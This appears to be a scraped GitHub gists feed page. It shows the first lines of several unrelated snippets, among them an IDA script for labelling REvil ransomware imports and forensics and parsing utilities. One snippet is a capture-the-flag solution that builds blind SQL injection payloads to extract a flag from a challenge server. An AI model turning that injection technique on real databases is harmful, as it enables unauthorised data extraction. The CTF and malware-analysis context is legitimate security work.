Skip to content

Instantly share code, notes, and snippets.

💭
offline

evandrix evandrix

💭
offline
Block or report user

Report or block evandrix

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@IanColdwater
IanColdwater / twittermute.txt
Last active Jan 26, 2020
Here are some terms to mute on Twitter to clean your timeline up a bit.
View twittermute.txt
Mute these words in your settings here: https://twitter.com/settings/muted_keywords
ActivityTweet
generic_activity_highlights
generic_activity_momentsbreaking
RankedOrganicTweet
suggest_activity
suggest_activity_feed
suggest_activity_highlights
suggest_activity_tweet
@RussianElmo
RussianElmo / Translator.Java
Last active Dec 26, 2019
Pig Latin Convertor
View Translator.Java
import java.util.Scanner;
public class Translator {
private static boolean checkVowel(Character l) {
String vowels = "AEIOUaeiou";
if (vowels.indexOf(l) != -1) {
return true;
}
return false;
}
@OALabs
OALabs / dll_exports.py
Created Dec 1, 2019
Build dictionary of DLL exports (Windows API Names)
View dll_exports.py
import os
import pefile
import json
INTERESTING_DLLS = [
'kernel32.dll', 'comctl32.dll', 'advapi32.dll', 'comdlg32.dll',
'gdi32.dll', 'msvcrt.dll', 'netapi32.dll', 'ntdll.dll',
'ntoskrnl.exe', 'oleaut32.dll', 'psapi.dll', 'shell32.dll',
'shlwapi.dll', 'srsvc.dll', 'urlmon.dll', 'user32.dll',
@OALabs
OALabs / revil_import_builder.py
Created Dec 1, 2019
IDA Python script to decipher and label REvil imports
View revil_import_builder.py
import json
# fn_name = "wsprintfW"
# api_hash = 0x0B6D391AE
export_db = {}
def get_api_hash(fn_name):
result = 0x2b
for c in fn_name:
@multiplex3r
multiplex3r / loadPcap.py
Last active Dec 15, 2019
Load a PCAP into neo4j with scapy
View loadPcap.py
#!/usr/bin/env python3
from scapy.all import *
from py2neo import Graph, Node, Relationship
packets = rdpcap("<your_pcap_file>")
g = Graph(password="<your_neo4j_password>")
for packet in packets.sessions():
pkt = packet.split()
View rosette.rkt
#lang rosette/safe
(require rosette/lib/angelic ; provides `choose*`
rosette/lib/match) ; provides `match`
; Tell Rosette we really do want to use integers.
(current-bitwidth #f)
@williballenthin
williballenthin / TxR.bt
Created Nov 22, 2019
010 Editor template for parsing Windows Registry TxR (.regtrans-ms) files
View TxR.bt
//------------------------------------------------
//--- 010 Editor v8.0.1 Binary Template
//
// File: Transactional Registry Transaction Logs (.TxR)
// Authors: Willi Ballenthin <william.ballenthin@fireeye.com>
// Version: 0.1
// Reference: https://www.fireeye.com/blog/threat-research/2019/01/digging-up-the-past-windows-registry-forensics-revisited.html
//------------------------------------------------
LittleEndian();
View User Authentication System.md

User authentication system

Your task is now to create a user authentication system.

This document will guide you through all the features and implication of such system, so that you don't have to search them yourself.

We will focus on web/browser-technologies, however similar concept can be widely applied. This guide, is a work in progress, feel free to comment and provide feedbacks.

Expected Workflows

@terjanq
terjanq / exploit.js
Last active Jan 12, 2020
This is a solution of Oracle v2 and Oracle v1 from https://nn9ed.ka0labs.org/challenges#x-oracle%20v2 (I realized I could use <meta> and redirect admin to my website and run the challenge in iframes after I already solved it with bruteforcing the admin :p)
View exploit.js
const fetch = require('node-fetch');
var flag = 'nn9ed{'
var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}'
var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}');
var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect
const base_url = 'http://x-oracle-v2.nn9ed.ka0labs.org/'
// Generates definitions for fonts
function generateFonts() {
View log-parsing.cpp
/*
* Given a log line that starts like this:
*
* 2014.01.27 19:35:51.639 (UTC-1) 3 1 ...
*
* the following takes about ~60 ms per call in a release build
* produced by a VC++ 2017 using its stock CRT (v141):
*/
sscanf(line,
You can’t perform that action at this time.